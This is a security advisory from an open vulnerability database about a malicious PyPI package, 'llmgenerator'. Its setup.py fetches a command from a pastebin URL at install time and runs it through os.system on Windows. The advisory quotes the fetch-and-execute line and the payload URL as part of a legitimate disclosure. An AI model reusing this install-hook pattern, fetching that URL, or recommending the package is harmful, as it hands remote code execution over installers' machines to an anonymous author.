llmgenerator @2.21
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-5770
Ecosystem
pypi
Summary
On pip install , setup.py performs an HTTP GET to https://pastebin.com/raw/yBcUM1QB, takes the first line of the response body, and passes it to os.system(f'cmd /c "{cmd_pastebin}"') . The fetched content is mutable, anonymous, and unauthenticated — the author can change what runs on every installer's machine at any time without republishing the package. The package ships no functional Python code (src/ contains only an empty.egg-info directory), confirming the package exists solely as a vehicle for the install-time dropper. The package name impersonates an LLM-tooling brand to attract installs. Installing this package grants arbitrary shell execution on the installer's Windows machine.
Source: amazon-inspector (06e55ac2d3368516d538c8efaad2b83814dbb61813f36ab5655f77677ca0d6be)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.